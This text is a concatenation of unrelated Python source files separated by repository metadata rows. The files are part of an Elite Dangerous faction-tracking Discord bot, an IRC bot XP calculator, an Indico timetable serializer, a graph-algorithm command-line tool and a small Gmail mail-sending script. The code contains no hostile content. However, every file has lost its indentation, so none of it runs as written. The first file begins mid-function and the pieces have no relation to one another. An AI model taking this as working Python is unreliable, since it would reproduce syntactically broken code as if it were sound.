insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', {'eddbid': faction.home_system_id}, 'object')
system_name = home_system_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
await db.execute(insert_faction, *faction_values)
await database.Database.close_connection(db)
async def _get_system_id(self, system_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_result = await db.fetchrow("SELECT id FROM star_system where name = $1", system_name)
if system_result is None:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'name': system_name}, 'object')
for system in home_system_data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'eddbid': system.controlling_minor_faction_id},
'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
system_id = system.id
await db.execute(insert_system, *system_values)
else:
system_id = system_result['id']
await database.Database.close_connection(db)
return system_id
async def _get_faction_id(self, faction_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
faction_result = await db.fetchrow("SELECT id FROM faction where name = $1", faction_name)
if faction_result is None:
faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'name': faction_name}, 'object')
for faction in faction_data.docs:
if str(faction.id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
faction_data = await Web.get_response(
'https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': faction.home_system_id}, 'object')
system_name = faction_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
faction_id = faction.id
await db.execute(insert_faction, *faction_values)
else:
faction_id = faction_result['id']
await database.Database.close_connection(db)
return faction_id
async def set_tick_date(self, date):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
if self.last_tick is None or self.last_tick < date:
insert_tick = "INSERT INTO tick(time) values($1) ON CONFLICT DO NOTHING"
await db.execute(insert_tick, date)
self.updated_systems = set()
self.war_cache = {}
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.last_tick = date
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
channel = self.bot.get_channel(BGS_CHANNEL)
# await self.recheck_systems() FIXME - EDDN API is currently not updating
self.faction_data[75253].message = await self.setup_bgs_message(channel, 75253) # Colonists of Aurora
self.faction_data[23831].message = await self.setup_bgs_message(channel, 23831) # Prismatic Imperium
self.faction_data[74847].message = await self.setup_bgs_message(channel, 74847) # Adamantine Union
update_faction = "UPDATE faction SET message_id = $1 WHERE id = $2"
await db.execute(update_faction, *(self.faction_data[75253].message, 75253))
await db.execute(update_faction, *(self.faction_data[23831].message, 23831))
await db.execute(update_faction, *(self.faction_data[74847].message, 74847))
await database.Database.close_connection(db)
async def setup_bgs_message(self, channel, faction_id):
embed = discord.Embed(colour=discord.Colour(0x992d22), url=self.faction_data[faction_id].link, title=self.faction_data[faction_id].name.upper())
embed.set_author(name="Tick at {:%d %b %Y %H:%M}".format(self.last_tick))
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select id as system_id, name from star_system where our_faction_id = $1 order by name"
system_count = 0
systems = []
async for (system_id, name) in db.cursor(system_select, faction_id):
system_count = system_count + 1
systems.append(name)
self.faction_data[faction_id].systems = system_count
# progress field
embed.add_field(name="Tour progress", value="0/{} - 0%".format(system_count), inline=False)
# missing stations
if len(systems) > 0:
missing_systems = ", ".join(systems)
else:
missing_systems = "Tour completed"
embed.add_field(name="Missing systems", value="{}".format(missing_systems), inline=False)
# states
embed.add_field(name="Active states", value="None", inline=False)
embed.add_field(name="Pending states", value="None")
embed.add_field(name="Recovering states", value="None")
# expansion warning
embed.add_field(name="Expansion warning", value="None")
# low inf warning
embed.add_field(name="Inf getting low", value="None")
# conflict warning
embed.add_field(name="Inf too low", value="None")
# Not controll system warning
embed.add_field(name="Not in control", value="None")
await database.Database.close_connection(db)
message = await channel.send(embed=embed)
# await message.pin()
return message.id
async def recheck_systems(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "SELECT id as system_id, our_faction_id FROM star_system WHERE our_faction_id > 0"
async for (system_id, our_faction_id) in db.cursor(system_select):
system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': system_id}, 'object')
present = False
for system in system_data.docs:
for faction in system.minor_faction_presences:
if faction.minor_faction_id == our_faction_id:
present = True
if not present:
remove_query = "DELETE FROM star_system WHERE id = $1"
await db.execute(remove_query, system_id)
await database.Database.close_connection(db)
async def init_bgs(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
tick_id, time = await db.fetchrow(tick_select)
self.tick_id = tick_id
self.last_tick = time
messages_select = "SELECT id as faction_id, message_id FROM faction where id in (74847, 23831, 75253)"
async for (faction_id, message_id) in db.cursor(messages_select):
system_select = "select count(*) as system_count from star_system where our_faction_id = $1"
async for record in db.cursor(system_select, faction_id):
self.faction_data[faction_id].systems = record['system_count']
self.faction_data[faction_id].message = message_id
states_select = "select star_system.name, influence.system, influence.influence, influence.states, pending, recovering from influence join star_system on star_system.id = influence.system where tick = $1 and faction = $2"
async for (name, system_id, influence, states, pending, recovering) in db.cursor(states_select, *(tick_id, faction_id)):
self.updated_systems.add(name)
self.faction_data[faction_id].set_active(states)
self.faction_data[faction_id].set_pending(pending)
self.faction_data[faction_id].set_recovering(recovering)
influence_select = "select faction, influence.influence from influence where influence.system = $1 and tick = $2 order by influence desc limit 2"
their_influence = 0
async for (inf_faction_id, faction_influence) in db.cursor(influence_select, *(system_id, tick_id)):
if not inf_faction_id == faction_id:
if faction_influence > their_influence:
their_influence = faction_influence
if influence > 65.00:
self.faction_data[faction_id].expansion_warning.append("{} {}%".format(name, round(influence, 2)))
else:
difference = influence - their_influence
if 10.00 < difference <= 20.00:
self.faction_data[faction_id].mild_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference < 0.00:
self.faction_data[faction_id].not_control.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference <= 10.00:
self.faction_data[faction_id].high_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
await self.update_message(faction_id)
await database.Database.close_connection(db)
async def update_message(self, faction_id, conflict_data=None):
faction = self.faction_data[faction_id]
channel = self.bot.get_channel(BGS_CHANNEL)
message = await channel.fetch_message(faction.message)
embed = message.embeds[0]
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select star_system.id as system_id, name from star_system" \
" left join influence on star_system.id = influence.system and tick = $1 " \
"where our_faction_id = $2 and influence.influence is null order by name;"
missing_count = 0
missing_systems = []
async for (system_id, name) in db.cursor(system_select, *(self.tick_id, faction_id)):
missing_count = missing_count + 1
missing_systems.append(name)
done_count = faction.systems - missing_count
percentage = 100 * done_count / faction.systems
embed.set_field_at(0, name="Tour progress", value="{}/{} - {}%".format(done_count, faction.systems, round(percentage)), inline=False)
if len(missing_systems) > 0:
systems = ", ".join(missing_systems)
else:
systems = "Tour completed"
embed.set_field_at(1, name="Missing systems", value="{}".format(systems), inline=False)
embed.set_field_at(2, name="Active states", value="{}".format(faction.active), inline=False)
embed.set_field_at(3, name="Pending states", value="{}".format(faction.pending))
embed.set_field_at(4, name="Recovering states", value="{}".format(faction.recovering))
if len(faction.expansion_warning) > 0:
expansion_warning = "\n".join(faction.expansion_warning)
else:
expansion_warning = "None"
if len(faction.mild_warning) > 0:
mild_warning = "\n".join(faction.mild_warning)
else:
mild_warning = "None"
if len(faction.high_warning) > 0:
high_warning = "\n".join(faction.high_warning)
else:
high_warning = "None"
if len(faction.not_control) > 0:
not_control = "\n".join(faction.not_control)
else:
not_control = "None"
embed.set_field_at(5, name="Expansion warning", value="{}".format(expansion_warning))
embed.set_field_at(6, name="Inf getting low", value="{}".format(mild_warning))
embed.set_field_at(7, name="Inf too low", value="{}".format(high_warning))
embed.set_field_at(8, name="Not in control", value="{}".format(not_control))
if conflict_data is not None:
name, value = conflict_data
embed.add_field(name=name, value=value)
await message.edit(embed=embed)
await database.Database.close_connection(db)
async def submit(self, data):
db = await database.Database.get_connection(self.bot.loop)
influences = []
our_influence = 0
our_id = 0
skip = False
conflict_data = None
async with db.transaction():
timestamp = isoparse(data.timestamp)
# if timestamp > self.last_tick and data.StarSystem not in self.updated_systems:
if timestamp > self.last_tick:
if data.StarSystem not in self.updated_systems:
self.updated_systems.add(data.StarSystem)
system_id = await self._get_system_id(data.StarSystem)
for faction in data.Factions:
faction_id = await self._get_faction_id(faction.Name)
states = ""
pending = ""
recovering = ""
try:
for state in faction.ActiveStates:
if len(states) > 0:
states = states + '|'
states = states + state.State
except AttributeError as e:
states = faction.FactionState
try:
for state in faction.RecoveringStates:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.State
except AttributeError as e:
recovering = ''
try:
for state in faction.PendingStates:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.State
except AttributeError as e:
pending = ''
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction_id,
system_id,
faction.Influence * 100,
self.tick_id,
states,
pending,
recovering
)
if faction_id in (75253, 23831, 74847):
our_faction = self.faction_data[faction_id]
our_influence = faction.Influence * 100
our_id = faction_id
our_faction.set_recovering(recovering)
our_faction.set_active(states)
our_faction.set_pending(pending)
influences.append(faction.Influence * 100)
await db.execute(insert_influence, *influence_values)
update_system = "UPDATE star_system SET our_faction_id = $1 WHERE id = $2"
await db.execute(update_system, *(our_id, system_id))
try:
for conflict in data.Conflicts:
faction1 = await self._get_faction_id(conflict.Faction1.Name)
faction2 = await self._get_faction_id(conflict.Faction2.Name)
if faction1 in (75253, 23831, 74847) or faction2 in (75253, 23831, 74847):
war_type = conflict.WarType.capitalize()
score1 = conflict.Faction1.WonDays
score2 = conflict.Faction2.WonDays
if war_type is "Civilwar":
war_type = "Civil war"
if data.StarSystem not in self.war_cache or self.war_cache[data.StarSystem] != score1 + score2:
self.war_cache[data.StarSystem] = score1 + score2
if faction1 in (75253, 23831, 74847):
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score1, score2))
else:
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score2, score1))
except AttributeError as e:
conflict_data = None
else:
skip = True
if not skip:
print(data.StarSystem + " recorded")
influences.sort(reverse=True)
if data.StarSystem in self.updated_systems:
for item in our_faction.expansion_warning:
if data.StarSystem in item:
our_faction.expansion_warning.remove(item)
for item in our_faction.mild_warning:
if data.StarSystem in item:
our_faction.mild_warning.remove(item)
for item in our_faction.not_control:
if data.StarSystem in item:
our_faction.not_control.remove(item)
for item in our_faction.high_warning:
if data.StarSystem in item:
our_faction.high_warning.remove(item)
if our_influence > 65.00:
our_faction.expansion_warning.append("{} {}%".format(data.StarSystem, round(our_influence, 2)))
else:
if our_influence == influences[0]:
difference = our_influence - influences[1]
else:
difference = our_influence - influences[0]
if 10.00 < difference <= 20.00:
our_faction.mild_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference < 0.00:
our_faction.not_control.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference <= 10.00:
our_faction.high_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
await self.update_message(our_id, conflict_data)
await database.Database.close_connection(db)
def setup(bot):
bot.add_cog(BGS(bot))
| mit | -6,322,656,993,902,909,000 | 51.201049 | 237 | 0.510901 | false | 4.355163 | false | false | false |
munin/munin | munin/mod/xp.py | 1 | 4204 | """
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# Nothing hardcoded found here.
# qebab, 24/6/08.
import re
from munin import loadable
class xp(loadable.loadable):
def __init__(self, cursor):
super().__init__(cursor, 1)
self.paramre = re.compile(
r"^\s*(\d+)[.-:\s](\d+)[.-:\s](\d+)(?:\s+(\d+)[.-:\s](\d+)[.-:\s](\d+))?(?:\s+(\d+))?"
)
self.usage = (
self.__class__.__name__ + " <defender coords> [attacker coords] [MCs]"
)
def execute(self, user, access, irc_msg):
m = self.paramre.search(irc_msg.command_parameters)
if not m:
irc_msg.reply("Usage: %s" % (self.usage,))
return 0
if access < self.level:
irc_msg.reply("You do not have enough access to use this command")
return 0
victim = None
attacker = None
mcs = 0
victim = loadable.planet(x=m.group(1), y=m.group(2), z=m.group(3))
if not victim.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet" % (victim.x, victim.y, victim.z)
)
return 1
if not victim:
irc_msg.reply("Usage: %s" % (self.usage,))
return 1
if m.lastindex >= 6 and m.group(4) and m.group(5) and m.group(6):
attacker = loadable.planet(x=m.group(4), y=m.group(5), z=m.group(6))
if not attacker.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet"
% (attacker.x, attacker.y, attacker.z)
)
return 1
if not attacker:
u = loadable.user(pnick=irc_msg.user)
u.load_from_db(self.cursor, irc_msg.round)
if not u.planet:
irc_msg.reply(
"You must be registered to use the automatic %s command (log in with P and "
"set mode +x, then make sure your planet is set with the pref command (!pref planet=x:y:z))"
% (self.__class__.__name__)
)
return 1
attacker = u.planet
if m.lastindex == 7:
mcs = int(m.group(7))
reply = "Target %s:%s:%s (%s|%s) " % (
victim.x,
victim.y,
victim.z,
self.format_real_value(victim.value),
self.format_real_value(victim.score),
)
reply += "| Attacker %s:%s:%s (%s|%s) " % (
attacker.x,
attacker.y,
attacker.z,
self.format_real_value(attacker.value),
self.format_real_value(attacker.score),
)
bravery = attacker.bravery(victim)
cap = int(attacker.cap_rate(victim) * victim.size)
min_xp, max_xp = attacker.calc_xp(victim, mcs)
min_score = self.format_real_value(60 * min_xp)
max_score = self.format_real_value(60 * max_xp)
reply += "| Bravery: %.2f | Cap: %d | MCs: %d | XP: %d-%d | Score: %s-%s" % (
bravery,
cap,
mcs,
min_xp,
max_xp,
min_score,
max_score
)
irc_msg.reply(reply)
return 1
| gpl-2.0 | 178,729,172,943,288,640 | 33.178862 | 112 | 0.545671 | false | 3.454396 | false | false | false |
eliasdesousa/indico | indico/modules/events/timetable/legacy.py | 2 | 16500 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from collections import defaultdict
from hashlib import md5
from itertools import chain
from flask import has_request_context, session
from sqlalchemy.orm import defaultload
from indico.modules.events.contributions.models.persons import AuthorType
from indico.modules.events.models.events import EventType
from indico.modules.events.timetable.models.entries import TimetableEntry, TimetableEntryType
from indico.util.date_time import iterdays
from indico.web.flask.util import url_for
class TimetableSerializer(object):
def __init__(self, event, management=False, user=None):
self.management = management
self.user = user if user is not None or not has_request_context() else session.user
self.event = event
self.can_manage_event = self.event.can_manage(self.user)
def serialize_timetable(self, days=None, hide_weekends=False, strip_empty_days=False):
tzinfo = self.event.tzinfo if self.management else self.event.display_tzinfo
self.event.preload_all_acl_entries()
timetable = {}
for day in iterdays(self.event.start_dt.astimezone(tzinfo), self.event.end_dt.astimezone(tzinfo),
skip_weekends=hide_weekends, day_whitelist=days):
date_str = day.strftime('%Y%m%d')
timetable[date_str] = {}
contributions_strategy = defaultload('contribution')
contributions_strategy.subqueryload('person_links')
contributions_strategy.subqueryload('references')
query_options = (contributions_strategy,
defaultload('session_block').subqueryload('person_links'))
query = (TimetableEntry.query.with_parent(self.event)
.options(*query_options)
.order_by(TimetableEntry.type != TimetableEntryType.SESSION_BLOCK))
for entry in query:
day = entry.start_dt.astimezone(tzinfo).date()
date_str = day.strftime('%Y%m%d')
if date_str not in timetable:
continue
if not entry.can_view(self.user):
continue
data = self.serialize_timetable_entry(entry, load_children=False)
key = self._get_entry_key(entry)
if entry.parent:
parent_code = 's{}'.format(entry.parent_id)
timetable[date_str][parent_code]['entries'][key] = data
else:
if (entry.type == TimetableEntryType.SESSION_BLOCK and
entry.start_dt.astimezone(tzinfo).date() != entry.end_dt.astimezone(tzinfo).date()):
# If a session block lasts into another day we need to add it to that day, too
timetable[entry.end_dt.astimezone(tzinfo).date().strftime('%Y%m%d')][key] = data
timetable[date_str][key] = data
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
def serialize_session_timetable(self, session_, without_blocks=False, strip_empty_days=False):
event_tz = self.event.tzinfo
timetable = {}
if session_.blocks:
start_dt = min(chain((b.start_dt for b in session_.blocks), (self.event.start_dt,))).astimezone(event_tz)
end_dt = max(chain((b.end_dt for b in session_.blocks), (self.event.end_dt,))).astimezone(event_tz)
else:
start_dt = self.event.start_dt_local
end_dt = self.event.end_dt_local
for day in iterdays(start_dt, end_dt):
timetable[day.strftime('%Y%m%d')] = {}
for block in session_.blocks:
block_entry = block.timetable_entry
if not block_entry:
continue
date_key = block_entry.start_dt.astimezone(event_tz).strftime('%Y%m%d')
entries = block_entry.children if without_blocks else [block_entry]
for entry in entries:
if not entry.can_view(self.user):
continue
entry_key = self._get_entry_key(entry)
timetable[date_key][entry_key] = self.serialize_timetable_entry(entry, load_children=True)
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
@staticmethod
def _strip_empty_days(timetable):
"""Return the timetable without the leading and trailing empty days."""
days = sorted(timetable)
first_non_empty = next((day for day in days if timetable[day]), None)
if first_non_empty is None:
return {}
last_non_empty = next((day for day in reversed(days) if timetable[day]), first_non_empty)
return {day: timetable[day] for day in days if first_non_empty <= day <= last_non_empty}
def serialize_timetable_entry(self, entry, **kwargs):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return self.serialize_session_block_entry(entry, kwargs.pop('load_children', True))
elif entry.type == TimetableEntryType.CONTRIBUTION:
return self.serialize_contribution_entry(entry)
elif entry.type == TimetableEntryType.BREAK:
return self.serialize_break_entry(entry)
else:
raise TypeError("Unknown timetable entry type.")
def serialize_session_block_entry(self, entry, load_children=True):
block = entry.session_block
data = {}
if not load_children:
entries = defaultdict(dict)
else:
entries = {self._get_entry_key(x): self.serialize_timetable_entry(x) for x in entry.children}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(block.session))
data.update(self._get_location_data(block))
data.update({'entryType': 'Session',
'sessionSlotId': block.id,
'sessionId': block.session_id,
'sessionCode': block.session.code,
'title': block.session.title,
'slotTitle': block.title,
'attachments': self._get_attachment_data(block.session),
'code': block.session.code,
'contribDuration': block.session.default_contribution_duration.seconds / 60,
'conveners': [self._get_person_data(x) for x in block.person_links],
'description': block.session.description,
'duration': block.duration.seconds / 60,
'isPoster': block.session.is_poster,
'entries': entries,
'pdf': url_for('sessions.export_session_timetable', block.session),
'url': url_for('sessions.display_session', block.session),
'friendlyId': block.session.friendly_id})
return data
def serialize_contribution_entry(self, entry):
from indico.modules.events.api import SerializerBase
block = entry.parent.session_block if entry.parent else None
contribution = entry.contribution
data = {}
data.update(self._get_entry_data(entry))
if contribution.session:
data.update(self._get_color_data(contribution.session))
data.update(self._get_location_data(contribution))
data.update({'entryType': 'Contribution',
'_type': 'ContribSchEntry',
'_fossil': 'contribSchEntryDisplay',
'contributionId': contribution.id,
'attachments': self._get_attachment_data(contribution),
'description': contribution.description,
'duration': contribution.duration.seconds / 60,
'pdf': url_for('contributions.export_pdf', entry.contribution),
'presenters': map(self._get_person_data,
sorted([p for p in contribution.person_links if p.is_speaker],
key=lambda x: (x.author_type != AuthorType.primary,
x.author_type != AuthorType.secondary,
x.display_order_key))),
'sessionCode': block.session.code if block else None,
'sessionId': block.session_id if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': contribution.title,
'url': url_for('contributions.display_contribution', contribution),
'friendlyId': contribution.friendly_id,
'references': map(SerializerBase.serialize_reference, contribution.references),
'board_number': contribution.board_number})
return data
def serialize_break_entry(self, entry, management=False):
block = entry.parent.session_block if entry.parent else None
break_ = entry.break_
data = {}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(break_))
data.update(self._get_location_data(break_))
data.update({'entryType': 'Break',
'_type': 'BreakTimeSchEntry',
'_fossil': 'breakTimeSchEntry',
'description': break_.description,
'duration': break_.duration.seconds / 60,
'sessionId': block.session_id if block else None,
'sessionCode': block.session.code if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': break_.title})
return data
def _get_attachment_data(self, obj):
def serialize_attachment(attachment):
return {'id': attachment.id,
'_type': 'Attachment',
'_fossil': 'attachment',
'title': attachment.title,
'download_url': attachment.download_url}
def serialize_folder(folder):
return {'id': folder.id,
'_type': 'AttachmentFolder',
'_fossil': 'folder',
'title': folder.title,
'attachments': map(serialize_attachment, folder.attachments)}
data = {'files': [], 'folders': []}
items = obj.attached_items
data['files'] = map(serialize_attachment, items.get('files', []))
data['folders'] = map(serialize_folder, items.get('folders', []))
if not data['files'] and not data['folders']:
data['files'] = None
return data
def _get_color_data(self, obj):
return {'color': '#' + obj.background_color,
'textColor': '#' + obj.text_color}
def _get_date_data(self, entry):
if self.management:
tzinfo = entry.event.tzinfo
else:
tzinfo = entry.event.display_tzinfo
return {'startDate': self._get_entry_date_dt(entry.start_dt, tzinfo),
'endDate': self._get_entry_date_dt(entry.end_dt, tzinfo)}
def _get_entry_data(self, entry):
from indico.modules.events.timetable.operations import can_swap_entry
data = {}
data.update(self._get_date_data(entry))
data['id'] = self._get_entry_key(entry)
data['uniqueId'] = data['id']
data['conferenceId'] = entry.event_id
if self.management:
data['isParallel'] = entry.is_parallel()
data['isParallelInSession'] = entry.is_parallel(in_session=True)
data['scheduleEntryId'] = entry.id
data['canSwapUp'] = can_swap_entry(entry, direction='up')
data['canSwapDown'] = can_swap_entry(entry, direction='down')
return data
def _get_entry_key(self, entry):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return 's{}'.format(entry.id)
elif entry.type == TimetableEntryType.CONTRIBUTION:
return 'c{}'.format(entry.id)
elif entry.type == TimetableEntryType.BREAK:
return 'b{}'.format(entry.id)
else:
raise ValueError()
def _get_entry_date_dt(self, dt, tzinfo):
return {'date': dt.astimezone(tzinfo).strftime('%Y-%m-%d'),
'time': dt.astimezone(tzinfo).strftime('%H:%M:%S'),
'tz': str(tzinfo)}
def _get_location_data(self, obj):
data = {}
data['location'] = obj.venue_name
data['room'] = obj.room_name
data['inheritLoc'] = obj.inherit_location
data['inheritRoom'] = obj.inherit_location
if self.management:
data['address'] = obj.address
return data
def _get_person_data(self, person_link):
person = person_link.person
data = {'firstName': person_link.first_name,
'familyName': person_link.last_name,
'affiliation': person_link.affiliation,
'emailHash': md5(person.email.encode('utf-8')).hexdigest() if person.email else None,
'name': person_link.get_full_name(last_name_first=False, last_name_upper=False,
abbrev_first_name=False, show_title=True),
'displayOrderKey': person_link.display_order_key}
if self.can_manage_event:
data['email'] = person.email
return data
def serialize_contribution(contribution):
return {'id': contribution.id,
'friendly_id': contribution.friendly_id,
'title': contribution.title}
def serialize_day_update(event, day, block=None, session_=None):
serializer = TimetableSerializer(event, management=True)
timetable = serializer.serialize_session_timetable(session_) if session_ else serializer.serialize_timetable()
block_id = serializer._get_entry_key(block) if block else None
day = day.strftime('%Y%m%d')
return {'day': day,
'entries': timetable[day] if not block else timetable[day][block_id]['entries'],
'slotEntry': serializer.serialize_session_block_entry(block) if block else None}
def serialize_entry_update(entry, session_=None):
serializer = TimetableSerializer(entry.event, management=True)
day = entry.start_dt.astimezone(entry.event.tzinfo)
day_update = serialize_day_update(entry.event, day, block=entry.parent, session_=session_)
return dict({'id': serializer._get_entry_key(entry),
'entry': serializer.serialize_timetable_entry(entry),
'autoOps': None},
**day_update)
def serialize_event_info(event):
return {'_type': 'Conference',
'id': unicode(event.id),
'title': event.title,
'startDate': event.start_dt_local,
'endDate': event.end_dt_local,
'isConference': event.type_ == EventType.conference,
'sessions': {sess.id: serialize_session(sess) for sess in event.sessions}}
def serialize_session(sess):
"""Return data for a single session"""
data = {
'_type': 'Session',
'address': sess.address,
'color': '#' + sess.colors.background,
'description': sess.description,
'id': sess.id,
'isPoster': sess.is_poster,
'location': sess.venue_name,
'room': sess.room_name,
'roomFullname': sess.room_name,
'textColor': '#' + sess.colors.text,
'title': sess.title,
'url': url_for('sessions.display_session', sess)
}
return data
| gpl-3.0 | 9,132,719,580,124,701,000 | 46.413793 | 117 | 0.593636 | false | 4.128096 | false | false | false |
adason/graph_algo | graph_algo/graph_algo.py | 1 | 1876 | # -*- coding: utf-8 -*-
"""Main program for Command Line interface
Usage:
graph_algo -h
graph_algo --version
graph_algo p1hw4 [-v] -i <file>
graph_algo p2hw4 [--argo <argo>] [-v] -i <file>...
graph_algo p2hw6 [-v] -i <file>...
Options:
-h --help show this help message and exit
--version show version and exit
-v --verbose print status messages
-i, --input <file>... input file(s)
--argo <algo> choose one algorithm
"""
from __future__ import unicode_literals, print_function
from docopt import docopt
from .graph import Graph
__version__ = "0.1.0"
__author__ = "Adason"
__license__ = "MIT"
def main():
"""Main entry point for the graph_algo CLI.
"""
args = docopt(__doc__, version=__version__)
# print(args)
if args["p1hw4"]:
g = Graph.read_input_part1_hw4(args["--input"][0])
sizes = []
for scc in g.kosaraju_sccs():
sizes.append(len(scc))
print(sorted(sizes, reverse=True))
elif args["p2hw4"]:
min_dists = []
for fn in args["--input"]:
g = Graph.read_input_part2_hw4(fn)
dist_pairs = g.floyd_warshall_apsp()
if dist_pairs:
min_dists.extend(dist_pairs.values())
if len(min_dists) > 0:
print(min(min_dists))
else:
print("NULL")
elif args["p2hw6"]:
for fn in args["--input"]:
g = Graph.read_input_part2_hw6(fn)
sol_status = 1
for scc in g.kosaraju_sccs():
scc_vids = set(scc)
for vid in scc:
if str(-int(vid)) in scc_vids:
sol_status = 0
break
if sol_status == 0:
break
print(sol_status, end="")
| mit | -7,334,569,178,823,456,000 | 26.588235 | 60 | 0.498934 | false | 3.474074 | false | false | false |
thecount12/madblog | pvgmail.py | 1 | 1101 | #!/usr/bin/python
# mail form program using gmail
import base64
import smtplib
from email.mime.text import MIMEText
# change smtpuser, zap
# recipients I use similar to carbon copy
# REPLY_TO_ADDRESS is the user filling out the form
def gmail(REPLY_TO_ADDRESS,data,subject):
smtpserver = 'smtp.gmail.com' # gmail smtp
smtpuser = 'user@gmail.com' # gmail user account
zap='' # enter encoded password
str(zap)
smtppass=base64.b64decode(zap)
RECIPIENTS = ["'blah' <user@yahoo.com>"]
msg = MIMEText(data)
msg['Subject'] = subject
msg.add_header('reply-to', REPLY_TO_ADDRESS)
mailServer = smtplib.SMTP('smtp.gmail.com',587) # 587
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(smtpuser, smtppass)
mailServer.sendmail(smtpuser,RECIPIENTS,msg.as_string())
mailServer.close()
if __name__=="__main__":
REPLY_TO_ADDRESS='user@linuxmail.org'
data="any message"
subject="whatever"
